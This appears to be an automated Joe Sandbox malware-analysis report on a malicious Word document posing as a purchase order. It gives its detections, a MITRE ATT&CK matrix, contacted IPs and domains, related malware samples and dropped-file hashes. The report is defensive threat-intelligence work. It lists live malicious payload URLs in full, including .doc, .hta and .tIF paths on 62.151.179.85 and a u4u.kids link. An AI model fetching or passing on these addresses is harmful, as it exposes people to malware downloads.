Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PO NAHK22012FA000000.docxStream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRD0000.tmp.0.drStream path 'CONTENTS' entropy: 7.98640213683 (max. 8.0)
Source: ~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp.0.drStream path '_1791189376/CONTENTS' entropy: 7.98640213683 (max. 8.0)

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
Exploitation for Client Execution		Path InterceptionPath Interception1
Masquerading		OS Credential Dumping1
File and Directory Discovery		Remote ServicesData from Local System1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Obfuscated Files or Information		LSASS Memory2
System Information Discovery		Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive14
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture4
Ingress Tool Transfer		Traffic DuplicationData Destruction

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PO NAHK22012FA000000.docx8%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
u4u.kids
24.199.88.84
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://u4u.kids/rxbtFA?&gamma-ray=angry&polo=arrogant&smog=earsplitting&peony=aloof&roast=big&children=squealing&swiss=mammoth&disarmamentfalse
      		unknown
      http://62.151.179.85/202/men/me/wegvenbestthingswithgoodthingswithgreatthings_______________verygoodpersonwithgreatcookieswithniceworkingpillwithgnice_________wearegoodforniceworkingthingstobein.docfalse
        		unknown

        World Map of Contacted IPs

        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs

        Public IPs

        IPDomainCountryFlagASNASN NameMalicious
        62.151.179.85
        		unknownSpain
        		8560ONEANDONE-ASBrauerstrasse48DEfalse
        24.199.88.84
        		u4u.kidsUnited States
        		12271TWC-12271-NYCUStrue

        General Information

        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1540372
        Start date and time:2024-10-23 17:49:08 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 43s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:defaultwindowsofficecookbook.jbs
        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
        Number of analysed new started processes analysed:9
        Number of new started drivers analysed:1
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:PO NAHK22012FA000000.docx
        Detection:MAL
        Classification:mal56.evad.winDOCX@1/16@7/2
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .docx
        • Found Word or Excel or PowerPoint or XPS Viewer
        • Attach to Office via COM
        • Scroll down
        • Close Viewer

        Warnings

        • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe
        • Report size getting too big, too many NtQueryValueKey calls found.
        • VT rate limit hit for: PO NAHK22012FA000000.docx

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        62.151.179.85derstand.docGet hashmaliciousUnknownBrowse
        • 62.151.179.85/401/nj/feelnicewithgreatthingsgreatdayscomingforgreat.hta
        feelnicewithgreatthingsgreatdayscomingforgreat.htaGet hashmaliciousCobalt StrikeBrowse
        • 62.151.179.85/401/getbackwithbestthingsforeithergoodthings.tIF
        24.199.88.84PO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
          Logs.xlsGet hashmaliciousLokibotBrowse
            Inv No.248740.xlsGet hashmaliciousUnknownBrowse
              InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                u4u.kidsPO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                Logs.xlsGet hashmaliciousLokibotBrowse
                • 24.199.88.84
                Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                • 24.199.88.84
                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                • 24.199.88.84

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                TWC-12271-NYCUSPO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                Logs.xlsGet hashmaliciousLokibotBrowse
                • 24.199.88.84
                Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                • 24.199.88.84
                byte.mpsl.elfGet hashmaliciousOkiruBrowse
                • 68.174.131.114
                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                • 24.199.88.84
                l6G93s9XLN.elfGet hashmaliciousMiraiBrowse
                • 68.173.141.203
                la.bot.arm5.elfGet hashmaliciousUnknownBrowse
                • 66.108.151.148
                la.bot.sh4.elfGet hashmaliciousUnknownBrowse
                • 72.231.14.8
                yakuza.m68k.elfGet hashmaliciousUnknownBrowse
                • 74.72.188.143
                la.bot.sparc.elfGet hashmaliciousUnknownBrowse
                • 24.90.54.210
                ONEANDONE-ASBrauerstrasse48DELlbpXphTu9.exeGet hashmaliciousUnknownBrowse
                • 217.160.0.132
                derstand.docGet hashmaliciousUnknownBrowse
                • 62.151.179.85
                feelnicewithgreatthingsgreatdayscomingforgreat.htaGet hashmaliciousCobalt StrikeBrowse
                • 62.151.179.85
                la.bot.mips.elfGet hashmaliciousUnknownBrowse
                • 212.227.7.107
                Sprawl.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 213.165.67.102
                Rundholterne89.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                • 213.165.67.118
                Invoice.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 217.160.0.158
                la.bot.powerpc.elfGet hashmaliciousMiraiBrowse
                • 212.227.7.42
                Request for 30 Downpayment.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 217.160.0.93
                la.bot.arm.elfGet hashmaliciousUnknownBrowse
                • 212.227.138.124

                JA3 Fingerprints

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                05af1f5ca1b87cc9cc9b25185115607dPO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                Logs.xlsGet hashmaliciousLokibotBrowse
                • 24.199.88.84
                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                • 24.199.88.84
                CLOSURE.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                • 24.199.88.84
                oodforme.docGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                EX0096959.docx.docGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                • 24.199.88.84
                BA4M310209H14956.xlsGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                MT103-539 PAYMENT (1).docx.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                • 24.199.88.84
                PaymentXConfirmationXcopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                • 24.199.88.84
                7dcce5b76c8b17472d024758970a406bPO NAHK22012FA00000.docx.docGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                Logs.xlsGet hashmaliciousLokibotBrowse
                • 24.199.88.84
                Inv No.248740.xlsGet hashmaliciousUnknownBrowse
                • 24.199.88.84
                InvoiceXCopy.xlsGet hashmaliciousSnake KeyloggerBrowse
                • 24.199.88.84
                EX0096959.docx.docGet hashmaliciousRemcosBrowse
                • 24.199.88.84
                Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                • 24.199.88.84
                Oct2024TU-580.xlsGet hashmaliciousUnknownBrowse
                • 24.199.88.84
                Inv No.248730.xlsGet hashmaliciousUnknownBrowse
                • 24.199.88.84
                Purchase Order IOI 7300194 Data Sheet.xlsGet hashmaliciousUnknownBrowse
                • 24.199.88.84
                SGS-Report0201024.xla.xlsxGet hashmaliciousFormBookBrowse
                • 24.199.88.84

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.025479304637521457
                Encrypted:false
                SSDEEP:6:I3DPcFzDI9vxggLRHtEhrRXv//4tfnRujlw//+GtluJ/eRuj:I3DPuzipEhtvYg3J/
                MD5:2657E084B6899E3EF5A03FED2E6DF945
                SHA1:1829D53BA4FCB59EC05F5783DF5348341B780083
                SHA-256:839358868337A62D9625471886C583EE00CAF15F2DD53F462511C5033820341D
                SHA-512:0595A28694960DF6B1BEA49A6484306373C11A7A04B495D050E2E743A0FF91BE34C91232EDCD1FEA4C383E485087FAB438C53461A888493E995AD733C01D7981
                Malicious:false
                Reputation:low
                Preview:......M.eFy...z.......N..q"<...S,...X.F...Fa.q.............................. ls^0G..d..z...........c0..K......H......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C075331.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1505804
                Entropy (8bit):0.6894867293295597
                Encrypted:false
                SSDEEP:768:AF6nq49ZMXFpwasuSkvsclCseeBysBjKsvcgBVYohKcKGXocoaNYDCrdhPREQjV:AFOq49Z+wasqvsclCseeosEsvxk5cTPN
                MD5:F243041BE67BE5A73D89A294CE9FD0CB
                SHA1:4E273C0C5A9343F825EBE0C5C74DC224D156CC35
                SHA-256:8E8EAACF577CCBDB358B7F90BDD533BE90494B6F29ADAF50C86559CFD9F9F93A
                SHA-512:D4DF8AF2C759C219E217938852B2FB34C6C8BCC1EFFBEC82626002AF3F0AA6BA3D8C6EE08DD01422C57BBCC426A8C7243D50F79BDF600A566D7D9817638A45F6
                Malicious:false
                Reputation:low
                Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\774DBF7E.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1505804
                Entropy (8bit):1.580637216937634
                Encrypted:false
                SSDEEP:6144:PuzAK2NbrSAraChic1IOzeMctuBFbU7kUFrwJcum:HHprHhitOaMcu0ZrOa
                MD5:16D17119385717EB030C09137CFC2F1D
                SHA1:F18DF1B6783088BA15A1773A85C6E01D4CD75484
                SHA-256:847936068167A69D977F1876C628CF24E2098A22791438691A9DD989F9A685F1
                SHA-512:69985654C934F24C06A4081267F23AF974D542B38488CF46EE7680295BD44C4BB8ED969E12415F8001F727005BD9B4DA018E871A76D9EA73465E63F85B3FA1AE
                Malicious:false
                Reputation:low
                Preview:....l...........R...I............)...;.. EMF................................8...X....................?...........................................)...;..........S...J...Q...P...........R...I...................S...J...P...(...x........... ....)...;..(...S...J.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BC8CED67.emf

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):106364
                Entropy (8bit):2.5203136559514965
                Encrypted:false
                SSDEEP:768:uWBy+Lsm72ub26fqoeNK+J99xoJOVlEX1iS6M+:Lu6FwlNl
                MD5:764EDEB272A488585426FCAD198077BD
                SHA1:ED41AA518AFDAAF487887889E799CA6FD0ECECF6
                SHA-256:9E7F18A268E22FF3D2AFC93E0C66F5FD47A570DDF1D1739165C6FCE9745FE7DC
                SHA-512:2AF4F299DD671B98A95693D1AF20129B79CE3C9DFFC8AF8043BE5387F60717C901A94B3694AA2149AFC9C8C6E095C615085FCF9D7288550C39BECB408195E4C7
                Malicious:false
                Reputation:low
                Preview:....l...............[...............2... EMF....|...........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\..."...........!...................................................\...'......................%..........................................................L...d...................................!..............?...........?................................'.......................%...........(.......................L...d...........\...............m...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D2BA46D4-F285-45D4-AEF2-11E565CB87CE}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):331776
                Entropy (8bit):7.832927089965957
                Encrypted:false
                SSDEEP:6144:yjQ86kryPGBHJStwU77zs9lm31NQNL02HXHVNpXq3JXrOCcetHkwGM3GW:yjQ7kyPGt4Ps921NQN4kl/Xq5bOC7xht
                MD5:04F2BDDB72BD5360336BAB4C11FE593A
                SHA1:A7FAFEA883A989BC4851D95BECA9B75AD6D96DA6
                SHA-256:9993ED429710C5515C88ACE6F853D113D1E66E5BAEE7CACDE5CBD79F1B065E9A
                SHA-512:6FFF5E72D165CB1FB1DBFB3D98975E231737C90F83A0A49A5EFDD4F75124EC5A71195108C647407812A043E2BEF06B5D826A0AF1F7C35DDB9119FDB8D1966BC0
                Malicious:false
                Reputation:low
                Preview:......................>.......................................................................V........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{57F82215-74BF-4E58-B177-BFDD3F7EBA9A}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1536
                Entropy (8bit):3.294505361521836
                Encrypted:false
                SSDEEP:24:9na3uuF3oKMMb8jNDLO+n+c6CFkcbiSI/jx9n:9D/48jVOi+c6Cji9
                MD5:BDB4092A6D55AA55FF69EE6B013EA8AB
                SHA1:8E636F38B9D0601AF0CC2EA023D8E11FFAE40CE6
                SHA-256:7EB68E3C0DABC59C5B3DB17925AF666ED7036998F845BA30D5E6ABC93F3B6827
                SHA-512:8EF831DC6A224BEF5103197880A251437B41CDF9671C75EBFBCAA305B672A152742D3A35610D9FE84FFFB6ED100EA77E4C5DC89BDCC7ACC15A98220C55DC35BB
                Malicious:false
                Reputation:low
                Preview:.................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>.........................E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . ...5.e.+.5.N.5.[...E.M.B.E.D. .A.c.r.o.E.x.c.h...D.o.c.u.m.e.n.t...D.C..... . .....E.M.B.E.D. .E.x.c.e.l...S.h.e.e.t...1.2..... . ...=.5.X.=.0.5.[.5.[.5.X.5.e.5.X.5.N.5.[.."5.X..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................d........gd+.......

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CE9AD520-4EB5-4337-9147-8A3BC8A776F2}.tmp

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Reputation:high, very likely benign file
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\{84694DAC-05D5-4C99-B045-630DEA859D5C}

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.02565127395944895
                Encrypted:false
                SSDEEP:6:I3DPc48AavxggLRkyeZllVq9ERXv//4tfnRujlw//+GtluJ/eRuj:I3DPOAcIj49ovYg3J/
                MD5:3D40F0AB5B7AC9BE40F8A6710AF84233
                SHA1:70AA66915BBCC2AD684600D05B6298AF8B3216E4
                SHA-256:E406C995B218537851584D12ADD7D6159BC51920C742A61E8632CD68C40D4150
                SHA-512:56496DC6367E0D93F286E0FEB788FBF902997A6F5F9EC4AF6458074426CC3B58F84F9AACECF052C5CD755434842AD9F5E03A7FC6781F365F4464A210622C06A7
                Malicious:false
                Reputation:low
                Preview:......M.eFy...z.Vy.E..B.a..+..@S,...X.F...Fa.q.............................j".9$dJ...............o....O.....(......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\{9A4C3352-153F-4619-A431-94F1F5FBEBE6}

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.025479304637521457
                Encrypted:false
                SSDEEP:6:I3DPcFzDI9vxggLRHtEhrRXv//4tfnRujlw//+GtluJ/eRuj:I3DPuzipEhtvYg3J/
                MD5:2657E084B6899E3EF5A03FED2E6DF945
                SHA1:1829D53BA4FCB59EC05F5783DF5348341B780083
                SHA-256:839358868337A62D9625471886C583EE00CAF15F2DD53F462511C5033820341D
                SHA-512:0595A28694960DF6B1BEA49A6484306373C11A7A04B495D050E2E743A0FF91BE34C91232EDCD1FEA4C383E485087FAB438C53461A888493E995AD733C01D7981
                Malicious:false
                Preview:......M.eFy...z.......N..q"<...S,...X.F...Fa.q.............................. ls^0G..d..z...........c0..K......H......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO NAHK22012FA000000.LNK

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Wed Oct 23 14:50:02 2024, length=464442, window=hide
                Category:dropped
                Size (bytes):1069
                Entropy (8bit):4.529852771071497
                Encrypted:false
                SSDEEP:24:8W2+b/XT9C14XpL34iyheVwo4iyDv3qJ57u:8a/XTo14Nih8wqJ9u
                MD5:3FA99EBCBDDC980A3F3C238044E47447
                SHA1:FACFC99B8E4C6303EF76F8DF0FDD098FE2815198
                SHA-256:E8C2645F708E24F04EE7BF7B58AF236FCACE20B593C7868577E3FB7FD8B2A319
                SHA-512:9A184F2ED4FAF4750FEF9FE60122576173A3CF98547084E78DDDCA0890F3B92B3E78612174302E9A911AEF4A8F750BA6D08299DBD06F2F56FD31F20C855C3A0D
                Malicious:false
                Preview:L..................F.... ......r......r...)..8c%..:............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....WY=~..user.8......QK.XWY=~*...&=....U...............A.l.b.u.s.....z.1......WF...Desktop.d......QK.X.WF.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.:...WYB~ .PONAHK~1.DOC..`.......WE..WE.*.........................P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0.0...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\621365\Users.user\Desktop\PO NAHK22012FA000000.docx.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O. .N.A.H.K.2.2.0.1.2.F.A.0.0.0.0.0.0...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......621365.........

                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Generic INItialization configuration [folders]
                Category:dropped
                Size (bytes):75
                Entropy (8bit):4.315355023771523
                Encrypted:false
                SSDEEP:3:H+Uk0/2m4YRk0/2v:Hzk0/ZRk0/I
                MD5:CFE23771994C01B94446FB7E34D51995
                SHA1:19DF2201F82C28E6310D95B122283AB629FA4E27
                SHA-256:8D75957A8114D08815E6B8EDB83F4F99E49B26F2130A0C91FB0CD3CA3B493614
                SHA-512:F56F918A1E5410787EBCEB7C0010754E07E873C412928CD46D0B1E7583A11522EAC6511ACA694D993EDB4970820A841B4F3EBC9FB1EEE9DD50E8E5D41018C2FF
                Malicious:false
                Preview:[misc]..PO NAHK22012FA000000.LNK=0..[folders]..PO NAHK22012FA000000.LNK=0..

                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.4797606462020307
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                Malicious:false
                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                C:\Users\user\Desktop\PO NAHK22012FA000000.docx (copy)

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Microsoft Word 2007+
                Category:dropped
                Size (bytes):511159
                Entropy (8bit):7.984551477565033
                Encrypted:false
                SSDEEP:12288:OIPqAC/+QF7bWa2XZqIfZvpEjPj/m7eQMPmLJ:ByGEbvOdVpEP/mKQMPmF
                MD5:5F812E0FB0A04215804082890159CA22
                SHA1:BB90FCF3EDB65162D4F92F55533585BD83AB813A
